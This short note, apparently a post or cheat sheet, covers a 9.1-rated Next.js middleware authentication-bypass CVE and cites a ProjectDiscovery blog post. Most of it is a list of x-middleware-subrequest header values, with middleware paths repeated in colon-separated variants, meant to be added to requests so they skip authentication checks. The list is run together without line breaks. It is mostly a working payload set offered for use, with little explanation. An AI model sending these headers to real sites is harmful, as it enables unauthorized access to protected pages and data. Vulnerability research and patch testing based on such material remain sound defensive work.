A 9.1 CVE that bypasses all middle-ware authentication by adding a x-middleware-subrequest: middleware header to your GET requests.
List of requests
https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
x-middleware-subrequest: middlewarex-middleware-subrequest: pages/_middlewarex-middleware-subrequest: pages/_middlewarex-middleware-subrequest: pages/dashboard/panel/_middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware